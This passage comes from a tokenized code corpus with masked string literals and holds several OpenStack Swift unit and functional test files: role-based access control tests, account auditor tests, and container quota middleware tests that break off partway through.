'<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:200> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> '<STR_LIT>' , '<STR_LIT>' , None , '<STR_LIT>' , <NUM_LIT:200> ) <EOL> ] <EOL> class SwiftClient ( object ) : <EOL> _tokens = { } <EOL> def __init__ ( self ) : <EOL> self . _set_users ( ) <EOL> self . auth_url = tf . swift_test_auth <EOL> self . insecure = tf . insecure <EOL> self . auth_version = tf . swift_test_auth_version <EOL> def _set_users ( self ) : <EOL> self . users = { } <EOL> for index in range ( <NUM_LIT:6> ) : <EOL> self . users [ tf . swift_test_user [ index ] ] = { <EOL> '<STR_LIT>' : tf . swift_test_tenant [ index ] , <EOL> '<STR_LIT:password>' : tf . swift_test_key [ index ] , <EOL> '<STR_LIT>' : tf . swift_test_domain [ index ] } <EOL> def _get_auth ( self , user_name ) : <EOL> info = self . users . get ( user_name ) <EOL> if info is None : <EOL> return None , None <EOL> os_options = { '<STR_LIT>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : info [ '<STR_LIT>' ] } <EOL> authargs = dict ( snet = False , tenant_name = info [ '<STR_LIT>' ] , <EOL> auth_version = self . auth_version , os_options = os_options , <EOL> insecure = self . insecure ) <EOL> storage_url , token = get_auth ( <EOL> self . auth_url , user_name , info [ '<STR_LIT:password>' ] , ** authargs ) <EOL> return storage_url , token <EOL> def auth ( self , user_name ) : <EOL> storage_url , token = SwiftClient . _tokens . get ( user_name , ( None , None ) ) <EOL> if not token : <EOL> SwiftClient . _tokens [ user_name ] = self . _get_auth ( user_name ) <EOL> storage_url , token = SwiftClient . _tokens . get ( user_name ) <EOL> return storage_url , token <EOL> def send_request ( self , method , url , token = None , headers = None , <EOL> service_token = None ) : <EOL> headers = { } if headers is None else headers . copy ( ) <EOL> headers . update ( { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' } ) <EOL> if token : <EOL> headers [ '<STR_LIT>' ] = token <EOL> if service_token : <EOL> headers [ '<STR_LIT>' ] = service_token <EOL> if self . insecure : <EOL> parsed , conn = http_connection ( url , insecure = self . insecure ) <EOL> else : <EOL> parsed , conn = http_connection ( url ) <EOL> conn . request ( method , parsed . path , headers = headers ) <EOL> resp = conn . getresponse ( ) <EOL> return resp <EOL> class BaseTestAC ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . reseller_admin = tf . swift_test_user [ <NUM_LIT:5> ] <EOL> self . client = SwiftClient ( ) <EOL> def _create_resource_url ( self , storage_url , account = None , <EOL> container = None , obj = None , reseller_prefix = None ) : <EOL> storage_url_list = storage_url . rstrip ( '<STR_LIT:/>' ) . split ( '<STR_LIT:/>' ) <EOL> base_url = '<STR_LIT:/>' . join ( storage_url_list [ : - <NUM_LIT:1> ] ) <EOL> if account is None : <EOL> account = storage_url_list [ - <NUM_LIT:1> ] <EOL> if reseller_prefix == '<STR_LIT>' : <EOL> i = ( account . index ( '<STR_LIT:_>' ) + <NUM_LIT:1> ) if '<STR_LIT:_>' in account else <NUM_LIT:0> <EOL> account = tf . swift_test_service_prefix + account [ i : ] <EOL> return '<STR_LIT:/>' . join ( [ part for part in ( base_url , account , container , obj ) <EOL> if part ] ) <EOL> def _put_container ( self , storage_url , token , test_case ) : <EOL> resource_url = self . _create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> reseller_prefix = test_case [ '<STR_LIT>' ] ) <EOL> self . created_resources . append ( resource_url ) <EOL> self . client . send_request ( '<STR_LIT>' , resource_url , token , <EOL> headers = test_case [ '<STR_LIT>' ] ) <EOL> def _put_object ( self , storage_url , token , test_case ) : <EOL> resource_url = self . _create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT:object_name>' ] , <EOL> reseller_prefix = test_case [ '<STR_LIT>' ] ) <EOL> self . created_resources . append ( resource_url ) <EOL> self . client . send_request ( '<STR_LIT>' , resource_url , token ) <EOL> def _get_storage_url_and_token ( self , storage_url_user , token_user ) : <EOL> storage_url , _junk = self . client . auth ( storage_url_user ) <EOL> _junk , token = self . client . auth ( token_user ) <EOL> return storage_url , token <EOL> def _prepare ( self , test_case ) : <EOL> storage_url , reseller_token = self . _get_storage_url_and_token ( <EOL> test_case [ '<STR_LIT>' ] , self . reseller_admin ) <EOL> if test_case [ '<STR_LIT>' ] in ( '<STR_LIT:GET>' , '<STR_LIT:POST>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> temp_test_case = test_case . copy ( ) <EOL> if test_case [ '<STR_LIT>' ] is None : <EOL> temp_test_case [ '<STR_LIT>' ] = uuid . uuid4 ( ) . hex <EOL> self . _put_container ( storage_url , reseller_token , temp_test_case ) <EOL> if test_case [ '<STR_LIT:object_name>' ] : <EOL> self . _put_object ( storage_url , reseller_token , test_case ) <EOL> elif test_case [ '<STR_LIT>' ] in ( '<STR_LIT>' , ) : <EOL> if test_case [ '<STR_LIT:object_name>' ] : <EOL> self . _put_container ( storage_url , reseller_token , test_case ) <EOL> def _execute ( self , test_case ) : <EOL> storage_url , token = self . _get_storage_url_and_token ( <EOL> test_case [ '<STR_LIT>' ] , test_case [ '<STR_LIT>' ] ) <EOL> service_user = test_case [ '<STR_LIT>' ] <EOL> service_token = ( None if service_user is None <EOL> else self . client . auth ( service_user ) [ <NUM_LIT:1> ] ) <EOL> resource_url = self . _create_resource_url ( <EOL> storage_url , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT>' ] , <EOL> test_case [ '<STR_LIT:object_name>' ] , <EOL> test_case [ '<STR_LIT>' ] ) <EOL> if test_case [ '<STR_LIT>' ] in ( '<STR_LIT>' ) : <EOL> self . created_resources . append ( resource_url ) <EOL> resp = self . client . send_request ( test_case [ '<STR_LIT>' ] , <EOL> resource_url , <EOL> token , <EOL> headers = test_case [ '<STR_LIT>' ] , <EOL> service_token = service_token ) <EOL> return resp . status <EOL> def _cleanup ( self ) : <EOL> _junk , reseller_token = self . client . auth ( self . reseller_admin ) <EOL> for resource_url in reversed ( self . created_resources ) : <EOL> resp = self . client . send_request ( '<STR_LIT>' , resource_url , <EOL> reseller_token ) <EOL> self . assertIn ( resp . status , ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> def _convert_data ( self , data ) : <EOL> test_case = dict ( zip ( TEST_CASE_FORMAT , data ) ) <EOL> if test_case [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> test_case [ '<STR_LIT>' ] = uuid . uuid4 ( ) . hex <EOL> if test_case [ '<STR_LIT:object_name>' ] == '<STR_LIT>' : <EOL> test_case [ '<STR_LIT:object_name>' ] = uuid . uuid4 ( ) . hex <EOL> return test_case <EOL> def _run_scenario ( self , scenario ) : <EOL> for data in scenario : <EOL> test_case = self . _convert_data ( data ) <EOL> self . created_resources = [ ] <EOL> try : <EOL> self . _prepare ( test_case ) <EOL> result = self . _execute ( test_case ) <EOL> self . assertEqual ( test_case [ '<STR_LIT>' ] , <EOL> result , <EOL> '<STR_LIT>' % <EOL> ( test_case [ '<STR_LIT>' ] , result , test_case ) ) <EOL> finally : <EOL> self . _cleanup ( ) <EOL> class TestRBAC ( BaseTestAC ) : <EOL> def test_rbac ( self ) : <EOL> if any ( ( tf . skip , tf . skip2 , tf . skip3 , tf . skip_if_not_v3 , <EOL> tf . skip_if_no_reseller_admin ) ) : <EOL> raise SkipTest <EOL> scenario_rbac = RBAC_PUT + RBAC_DELETE + RBAC_GET + RBAC_HEAD + RBAC_POST + RBAC_OPTIONS <EOL> shuffle ( scenario_rbac ) <EOL> self . _run_scenario ( scenario_rbac ) <EOL> def test_rbac_with_service_prefix ( self ) : <EOL> if any ( ( tf . skip , tf . skip2 , tf . skip3 , tf . skip_if_not_v3 , <EOL> tf . skip_service_tokens , tf . skip_if_no_reseller_admin ) ) : <EOL> raise SkipTest <EOL> scenario_rbac = RBAC_PUT_WITH_SERVICE_PREFIX + RBAC_DELETE_WITH_SERVICE_PREFIX + RBAC_GET_WITH_SERVICE_PREFIX + RBAC_HEAD_WITH_SERVICE_PREFIX + RBAC_POST_WITH_SERVICE_PREFIX + RBAC_OPTIONS_WITH_SERVICE_PREFIX <EOL> shuffle ( scenario_rbac ) <EOL> self . _run_scenario ( scenario_rbac ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from collections import defaultdict <EOL> import itertools <EOL> import unittest <EOL> import mock <EOL> import time <EOL> import os <EOL> import random <EOL> from tempfile import mkdtemp <EOL> from shutil import rmtree <EOL> from eventlet import Timeout <EOL> from swift . account import auditor <EOL> from swift . common . storage_policy import POLICIES <EOL> from swift . common . utils import Timestamp <EOL> from test . unit import debug_logger , patch_policies , with_tempdir <EOL> from test . unit . account . test_backend import ( <EOL> AccountBrokerPreTrackContainerCountSetup ) <EOL> class FakeAccountBroker ( object ) : <EOL> def __init__ ( self , path ) : <EOL> self . path = path <EOL> self . db_file = path <EOL> self . file = os . path . basename ( path ) <EOL> def is_deleted ( self ) : <EOL> return False <EOL> def get_info ( self ) : <EOL> if self . file . startswith ( '<STR_LIT>' ) : <EOL> raise ValueError ( ) <EOL> if self . file . startswith ( '<STR_LIT:true>' ) : <EOL> return defaultdict ( int ) <EOL> def get_policy_stats ( self , ** kwargs ) : <EOL> if self . file . startswith ( '<STR_LIT>' ) : <EOL> raise ValueError ( ) <EOL> if self . file . startswith ( '<STR_LIT:true>' ) : <EOL> return defaultdict ( int ) <EOL> class TestAuditor ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . testdir = os . path . join ( mkdtemp ( ) , '<STR_LIT>' ) <EOL> self . logger = debug_logger ( ) <EOL> rmtree ( self . testdir , ignore_errors = <NUM_LIT:1> ) <EOL> os . mkdir ( self . testdir ) <EOL> fnames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> for fn in fnames : <EOL> with open ( os . path . join ( self . testdir , fn ) , '<STR_LIT>' ) as f : <EOL> f . write ( '<STR_LIT:U+0020>' ) <EOL> def tearDown ( self ) : <EOL> rmtree ( os . path . dirname ( self . testdir ) , ignore_errors = <NUM_LIT:1> ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_run_forever ( self ) : <EOL> sleep_times = random . randint ( <NUM_LIT:5> , <NUM_LIT:10> ) <EOL> call_times = sleep_times - <NUM_LIT:1> <EOL> class FakeTime ( object ) : <EOL> def __init__ ( self ) : <EOL> self . times = <NUM_LIT:0> <EOL> def sleep ( self , sec ) : <EOL> self . times += <NUM_LIT:1> <EOL> if self . times >= sleep_times : <EOL> raise ValueError ( ) <EOL> def time ( self ) : <EOL> return time . time ( ) <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> with mock . patch ( '<STR_LIT>' , FakeTime ( ) ) : <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> self . assertRaises ( ValueError , test_auditor . run_forever ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> * call_times ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> * call_times ) <EOL> def fake_one_audit_pass ( reported ) : <EOL> raise Timeout ( ) <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_one_audit_pass ) : <EOL> with mock . patch ( '<STR_LIT>' , FakeTime ( ) ) : <EOL> self . assertRaises ( ValueError , test_auditor . run_forever ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> * call_times ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> * call_times ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_run_once ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> test_auditor . run_once ( ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_one_audit_pass ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> def fake_audit_location_generator ( * args , ** kwargs ) : <EOL> files = os . listdir ( self . testdir ) <EOL> return [ ( os . path . join ( self . testdir , f ) , '<STR_LIT>' , '<STR_LIT>' ) for f in files ] <EOL> test_auditor . logging_interval = <NUM_LIT:0> <EOL> with mock . patch ( '<STR_LIT>' , <EOL> fake_audit_location_generator ) : <EOL> test_auditor . _one_audit_pass ( test_auditor . logging_interval ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:0> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:0> ) <EOL> @ mock . patch ( '<STR_LIT>' , FakeAccountBroker ) <EOL> def test_account_auditor ( self ) : <EOL> conf = { } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> files = os . listdir ( self . testdir ) <EOL> for f in files : <EOL> path = os . path . join ( self . testdir , f ) <EOL> test_auditor . account_audit ( path ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:2> ) <EOL> self . assertEqual ( test_auditor . account_passes , <NUM_LIT:3> ) <EOL> @ patch_policies <EOL> class TestAuditorRealBrokerMigration ( <EOL> AccountBrokerPreTrackContainerCountSetup , unittest . TestCase ) : <EOL> def test_db_migration ( self ) : <EOL> policies = itertools . cycle ( POLICIES ) <EOL> num_containers = len ( POLICIES ) * <NUM_LIT:3> <EOL> per_policy_container_counts = defaultdict ( int ) <EOL> for i in range ( num_containers ) : <EOL> name = '<STR_LIT>' % i <EOL> policy = next ( policies ) <EOL> self . broker . put_container ( name , next ( self . ts ) , <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , int ( policy ) ) <EOL> per_policy_container_counts [ int ( policy ) ] += <NUM_LIT:1> <EOL> self . broker . _commit_puts ( ) <EOL> self . assertEqual ( num_containers , <EOL> self . broker . get_info ( ) [ '<STR_LIT>' ] ) <EOL> self . assertUnmigrated ( self . broker ) <EOL> conf = { '<STR_LIT>' : self . tempdir , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : self . tempdir } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = debug_logger ( ) ) <EOL> test_auditor . run_once ( ) <EOL> self . restore_account_broker ( ) <EOL> broker = auditor . AccountBroker ( self . db_path ) <EOL> with broker . get ( ) as conn : <EOL> rows = conn . execute ( '''<STR_LIT>''' ) . fetchall ( ) <EOL> for policy_index , container_count in rows : <EOL> self . assertEqual ( container_count , <EOL> per_policy_container_counts [ policy_index ] ) <EOL> class TestAuditorRealBroker ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . logger = debug_logger ( ) <EOL> @ with_tempdir <EOL> def test_db_validate_fails ( self , tempdir ) : <EOL> ts = ( Timestamp ( t ) . internal for t in itertools . count ( int ( time . time ( ) ) ) ) <EOL> db_path = os . path . join ( tempdir , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:0>' , '<STR_LIT:0>' , '<STR_LIT:0>' , '<STR_LIT>' ) <EOL> broker = auditor . AccountBroker ( db_path , account = '<STR_LIT:a>' ) <EOL> broker . initialize ( next ( ts ) ) <EOL> policies = itertools . cycle ( POLICIES ) <EOL> num_containers = len ( POLICIES ) * <NUM_LIT:3> <EOL> per_policy_container_counts = defaultdict ( int ) <EOL> for i in range ( num_containers ) : <EOL> name = '<STR_LIT>' % i <EOL> policy = next ( policies ) <EOL> broker . put_container ( name , next ( ts ) , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , int ( policy ) ) <EOL> per_policy_container_counts [ int ( policy ) ] += <NUM_LIT:1> <EOL> broker . _commit_puts ( ) <EOL> self . assertEqual ( broker . get_info ( ) [ '<STR_LIT>' ] , num_containers ) <EOL> messed_up_policy = random . choice ( list ( POLICIES ) ) <EOL> with broker . get ( ) as conn : <EOL> conn . executescript ( '''<STR_LIT>''' % int ( messed_up_policy ) ) <EOL> policy_stats = broker . get_policy_stats ( ) <EOL> self . assertEqual ( <EOL> policy_stats [ int ( messed_up_policy ) ] [ '<STR_LIT>' ] , <EOL> per_policy_container_counts [ int ( messed_up_policy ) ] - <NUM_LIT:1> ) <EOL> conf = { '<STR_LIT>' : tempdir , '<STR_LIT>' : False , <EOL> '<STR_LIT>' : tempdir } <EOL> test_auditor = auditor . AccountAuditor ( conf , logger = self . logger ) <EOL> test_auditor . run_once ( ) <EOL> self . assertEqual ( test_auditor . account_failures , <NUM_LIT:1> ) <EOL> error_lines = test_auditor . logger . get_lines_for_level ( '<STR_LIT:error>' ) <EOL> self . assertEqual ( len ( error_lines ) , <NUM_LIT:1> ) <EOL> error_message = error_lines [ <NUM_LIT:0> ] <EOL> self . assertTrue ( broker . db_file in error_message ) <EOL> self . assertTrue ( '<STR_LIT>' in error_message ) <EOL> self . assertTrue ( '<STR_LIT>' in error_message ) <EOL> self . assertEqual ( test_auditor . logger . get_increment_counts ( ) , <EOL> { '<STR_LIT>' : <NUM_LIT:1> } ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from swift . common . swob import Request , HTTPUnauthorized <EOL> from swift . common . middleware import container_quotas <EOL> class FakeCache ( object ) : <EOL> def __init__ ( self , val ) : <EOL> if '<STR_LIT:status>' not in val : <EOL> val [ '<STR_LIT:status>' ] = <NUM_LIT:200> <EOL> self . val = val <EOL> def get ( self , * args ) : <EOL> return self . val <EOL> class FakeApp ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , env , start_response ) : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ ] <EOL> class FakeMissingApp ( object ) : <EOL> def __init__ ( self ) : <EOL> pass <EOL> def __call__ ( self , env , start_response ) : <EOL> start_response ( '<STR_LIT>' , [ ] ) <EOL> return [ ] <EOL> def start_response ( * args ) : <EOL> pass <EOL> class TestContainerQuotas ( unittest . TestCase ) : <EOL> def test_split_path_empty_container_path_segment ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT:key>' : '<STR_LIT:value>' } } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_handled ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_no_quotas ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : FakeCache ( { } ) , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_exceed_bytes_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_bytes_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_bytes_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_not_exceed_bytes_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_bytes_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_bytes_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_bytes_quota_copy_from_no_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_bytes_quota_copy_from_bad_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_bytes_quota_copy_verb_no_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_exceed_counts_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> 